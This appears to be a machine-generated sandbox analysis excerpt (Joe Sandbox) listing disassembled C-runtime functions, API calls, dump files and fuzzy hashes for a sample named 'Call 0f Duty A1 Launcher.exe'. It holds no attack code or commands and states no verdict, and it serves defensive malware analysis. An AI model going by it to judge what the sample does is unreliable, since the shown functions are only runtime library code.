                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 006C6223
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 006C6278
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: ^l$csm
                                                                                                • API String ID: 1170836740-664566743
                                                                                                • Opcode ID: dbe6328ad358ed2c762e176530ef7687eb17a315157158ee3c12af76b1504dc6
                                                                                                • Instruction ID: c2836527ddeb5e77d73d8cb8c29309e68daf02467e2daaee37e76af8995d611c
                                                                                                • Opcode Fuzzy Hash: dbe6328ad358ed2c762e176530ef7687eb17a315157158ee3c12af76b1504dc6
                                                                                                • Instruction Fuzzy Hash: 8A41B134A00218EBCF10DF69C884FAEBBA2EF05314F18815DF8156B392D735AA01CB99
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                • String ID:
                                                                                                • API String ID: 127012223-0
                                                                                                • Opcode ID: f789d9664c22535a6f23ba785d5e6ff90e0f165505a4c39b42aa5c6844ab5dfc
                                                                                                • Instruction ID: a28e8d7fa784a6538b6f62941b04d6d7f9ace793b003fd1abb2226b323dcb251
                                                                                                • Opcode Fuzzy Hash: f789d9664c22535a6f23ba785d5e6ff90e0f165505a4c39b42aa5c6844ab5dfc
                                                                                                • Instruction Fuzzy Hash: A971A272D00246ABEF219E64A942FFE7BBBDF49310F29015AED05A7341E735DD008BA4
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,006C8831,006C5F0D,006C55A4), ref: 006C8848
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006C8856
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006C886F
                                                                                                • SetLastError.KERNEL32(00000000,006C8831,006C5F0D,006C55A4), ref: 006C88C1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: 874eb10f6f0fe3f4078cb2048a6d9d6dfaef318011a23badae629e28c4a19ef8
                                                                                                • Instruction ID: fd480d046bf93d4f9cb2b0bc2c895ace52f61c0cbbaf4cac4ef17af0e5c2e286
                                                                                                • Opcode Fuzzy Hash: 874eb10f6f0fe3f4078cb2048a6d9d6dfaef318011a23badae629e28c4a19ef8
                                                                                                • Instruction Fuzzy Hash: 9701D43261B2119EEB742AB4BC86FBE2797EB517B4361133EF010866E5EF118C01A254
                                                                                                Strings
                                                                                                • C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe, xrefs: 006CCB70
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                                • API String ID: 0-3876332877
                                                                                                • Opcode ID: 486935cfb1cd336aed43b83f7ede7ced895d3eea0729a7f38aae30f1c1a7f060
                                                                                                • Instruction ID: e38ea1a5ea57201fb17bc11631cd18cc3d6ad9c2b07cfc6c31ed9c99cb6b81f4
                                                                                                • Opcode Fuzzy Hash: 486935cfb1cd336aed43b83f7ede7ced895d3eea0729a7f38aae30f1c1a7f060
                                                                                                • Instruction Fuzzy Hash: 59216F71600205AFDB20AFA99D82FBA77ABEF543B4B10452DF82DD7651D730EC419BA0
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C362B542,?,?,00000000,006D25EB,000000FF,?,006C7015,00000002,?,006C70B1,006C83A0), ref: 006C6F89
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006C6F9B
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,006D25EB,000000FF,?,006C7015,00000002,?,006C70B1,006C83A0), ref: 006C6FBD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: f68bca5a3a6d3b0350017ca2bc67691358ed0fb97b3e326d838e44b78e722d29
                                                                                                • Instruction ID: 47784836d93b425e62a517eb87147257a6f46614a4ad79dc271b85372fed93b3
                                                                                                • Opcode Fuzzy Hash: f68bca5a3a6d3b0350017ca2bc67691358ed0fb97b3e326d838e44b78e722d29
                                                                                                • Instruction Fuzzy Hash: A401A231D04619ABCB119F50DC09FFEB7BAFB44B11F05052AF821E2390DBB49900CAA4
                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 006CDFA2
                                                                                                • __alloca_probe_16.LIBCMT ref: 006CE06B
                                                                                                • __freea.LIBCMT ref: 006CE0D2
                                                                                                  • Part of subcall function 006CBC45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006C41E0,?,?,006C1007,?,006BFAB5), ref: 006CBC77
                                                                                                • __freea.LIBCMT ref: 006CE0E5
                                                                                                • __freea.LIBCMT ref: 006CE0F2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1423051803-0
                                                                                                • Opcode ID: ad2cadcb5e34d7470090f7134384e3547bb50f317745fdfb547be3aff19b944b
                                                                                                • Instruction ID: 5ec2a7679f0c9c95f3de1209857fc49ee70c13bfdbe2d4afd03bf91603220dbb
                                                                                                • Opcode Fuzzy Hash: ad2cadcb5e34d7470090f7134384e3547bb50f317745fdfb547be3aff19b944b
                                                                                                • Instruction Fuzzy Hash: DC518E72600216ABDB215E60CC82FBB7BBBEF44710B15412DF905D7241EBB2DC60D6E4
                                                                                                APIs
                                                                                                • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006C93FE,?,?,00000000,00000000,00000000,?), ref: 006C951D
                                                                                                • CatchIt.LIBVCRUNTIME ref: 006C9603
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: CatchEncodePointer
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 1435073870-2084237596
                                                                                                • Opcode ID: 94f5ed7f9dc1cca785f35b6da27f83a4202d520d4b896fa5c032f7b265b18332
                                                                                                • Instruction ID: c60f12104fe7a94be784d8d2db2e127b2597c5ddda31190392288286fa28880b
                                                                                                • Opcode Fuzzy Hash: 94f5ed7f9dc1cca785f35b6da27f83a4202d520d4b896fa5c032f7b265b18332
                                                                                                • Instruction Fuzzy Hash: 96414671900209AFDF16DF98CC89EEEBBB6EF48300F18809DF905A7261D735A950DB64
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,006CDCFA,00000000,?,006DCCD0,?,?,?,006CDC31,00000004,InitializeCriticalSectionEx,006D46F8,006D4700), ref: 006CDC6B
                                                                                                • GetLastError.KERNEL32(?,006CDCFA,00000000,?,006DCCD0,?,?,?,006CDC31,00000004,InitializeCriticalSectionEx,006D46F8,006D4700,00000000,?,006C971C), ref: 006CDC75
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006CDC9D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 3177248105-2084034818
                                                                                                • Opcode ID: c02dd402e4c4104220f2607d708bf28a7d62b35eba6c844884019a8fc21244ab
                                                                                                • Instruction ID: adac7c337e0de14bb2aed6055ef5dc678a95281b7b673cc09e91cbc923e4962f
                                                                                                • Opcode Fuzzy Hash: c02dd402e4c4104220f2607d708bf28a7d62b35eba6c844884019a8fc21244ab
                                                                                                • Instruction Fuzzy Hash: CCE04830A40205BFEF102F51DC0AF693B9BEB00B54F144035F90DE81E1EBA2A811C554
                                                                                                APIs
                                                                                                • GetConsoleOutputCP.KERNEL32(C362B542,00000000,00000000,?), ref: 006CE64B
                                                                                                  • Part of subcall function 006CD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006C87B1,?,00000000,?), ref: 006CD192
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006CE89D
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006CE8E3
                                                                                                • GetLastError.KERNEL32 ref: 006CE986
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                • String ID:
                                                                                                • API String ID: 2112829910-0
                                                                                                • Opcode ID: ce3753fe025de49ed89ee5f4e719a84289a68f0067a216ddbd134a2dea51dc00
                                                                                                • Instruction ID: b9eaeb5052b11ec6b6b128ee64dbf7bff8a6590aa9b5de9008ccf90341b65b41
                                                                                                • Opcode Fuzzy Hash: ce3753fe025de49ed89ee5f4e719a84289a68f0067a216ddbd134a2dea51dc00
                                                                                                • Instruction Fuzzy Hash: C1D17A75D002599FCF15CFA8C880AEDBBBAFF49314F28416EE456EB351D631A942CB60
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1740715915-0
                                                                                                • Opcode ID: 2e598873a3d49aa499a496656f1be3726758436dd031efd21970af0d870e3b25
                                                                                                • Instruction ID: 5f1b46276a026795195bcd976e8e8a1fb0fa9f39657c1c7ebce738f2d59d1ced
                                                                                                • Opcode Fuzzy Hash: 2e598873a3d49aa499a496656f1be3726758436dd031efd21970af0d870e3b25
                                                                                                • Instruction Fuzzy Hash: AA510472605606AFEB399F54C849FBA73A7FF00340F14012DE9158B291EB31EC80CBA4
                                                                                                APIs
                                                                                                  • Part of subcall function 006CD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006C87B1,?,00000000,?), ref: 006CD192
                                                                                                • GetLastError.KERNEL32 ref: 006CC61C
                                                                                                • __dosmaperr.LIBCMT ref: 006CC623
                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 006CC65D
                                                                                                • __dosmaperr.LIBCMT ref: 006CC664
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1913693674-0
                                                                                                • Opcode ID: 6d2c2e21666acfde815e28b665dbe16f28b78a36f07e2bf6dbeecd79bb6ab153
                                                                                                • Instruction ID: 8a26ac90d07e1153e7be0d235d146a9a349f30ec45738455e87807405ef9b588
                                                                                                • Opcode Fuzzy Hash: 6d2c2e21666acfde815e28b665dbe16f28b78a36f07e2bf6dbeecd79bb6ab153
                                                                                                • Instruction Fuzzy Hash: 6521D071600205AFCB20AF628981F7AB7ABEF44374B10942DF82DD3211D730EC419BA4
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 006CD235
                                                                                                  • Part of subcall function 006CD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006C87B1,?,00000000,?), ref: 006CD192
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006CD26D
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006CD28D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 158306478-0
                                                                                                • Opcode ID: 68a0fc9cbbd551d911fcd3dfe37007f07fec7f0d80b13647d7294fcf207f61d4
                                                                                                • Instruction ID: 80318bc96ed31820a51824bf0d97c1fa91b07f98c0a7fa8066c1ca37d906cc80
                                                                                                • Opcode Fuzzy Hash: 68a0fc9cbbd551d911fcd3dfe37007f07fec7f0d80b13647d7294fcf207f61d4
                                                                                                • Instruction Fuzzy Hash: 7F11DBF1A015197E671137B19C8AEBF6A9FDE953A4B10003DF902D2102FB64CE024575
                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,006CFF31,00000000,00000001,00000000,?,?,006CE9DA,?,00000000,00000000), ref: 006D07D7
                                                                                                • GetLastError.KERNEL32(?,006CFF31,00000000,00000001,00000000,?,?,006CE9DA,?,00000000,00000000,?,?,?,006CE320,00000000), ref: 006D07E3
                                                                                                  • Part of subcall function 006D0840: CloseHandle.KERNEL32(FFFFFFFE,006D07F3,?,006CFF31,00000000,00000001,00000000,?,?,006CE9DA,?,00000000,00000000,?,?), ref: 006D0850
                                                                                                • ___initconout.LIBCMT ref: 006D07F3
                                                                                                  • Part of subcall function 006D0815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006D07B1,006CFF1E,?,?,006CE9DA,?,00000000,00000000,?), ref: 006D0828
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,006CFF31,00000000,00000001,00000000,?,?,006CE9DA,?,00000000,00000000,?), ref: 006D0808
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: 1045f24c5f01b930da20fbc8911c779f7dec39363ddab3f862903a8fb708bee8
                                                                                                • Instruction ID: 7bbe33d81ce6215e81d909e49220c0a741b520b53b8d35a5bad8327bad738d5e
                                                                                                • Opcode Fuzzy Hash: 1045f24c5f01b930da20fbc8911c779f7dec39363ddab3f862903a8fb708bee8
                                                                                                • Instruction Fuzzy Hash: 11F01236801158BBCF222F91DC04ACD3F67FF483A1F019416FA1885221C672C820ABD1
                                                                                                APIs
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 006C8D75
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___except_validate_context_record
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 3493665558-3733052814
                                                                                                • Opcode ID: 59c510e0acd76fad2d83b69b5c184c2966916990ae5a207c822b7e8c2bcb4555
                                                                                                • Instruction ID: 1d924bc5061ba562363c580452f82ea986becf904ae0b3c5f143bd85da768147
                                                                                                • Opcode Fuzzy Hash: 59c510e0acd76fad2d83b69b5c184c2966916990ae5a207c822b7e8c2bcb4555
                                                                                                • Instruction Fuzzy Hash: FB31AE76410259EFCF329F50C844EBA7B67EF48314B18865EF9445A221CB32ED61DB81
                                                                                                APIs
                                                                                                  • Part of subcall function 006C4533: __EH_prolog3_GS.LIBCMT ref: 006C453A
                                                                                                • std::domain_error::domain_error.LIBCPMT ref: 006C45EC
                                                                                                  • Part of subcall function 006C43A4: std::exception::exception.LIBCONCRT ref: 006C43BA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                                                • String ID: CDl$CDl
                                                                                                • API String ID: 2144476180-2887887983
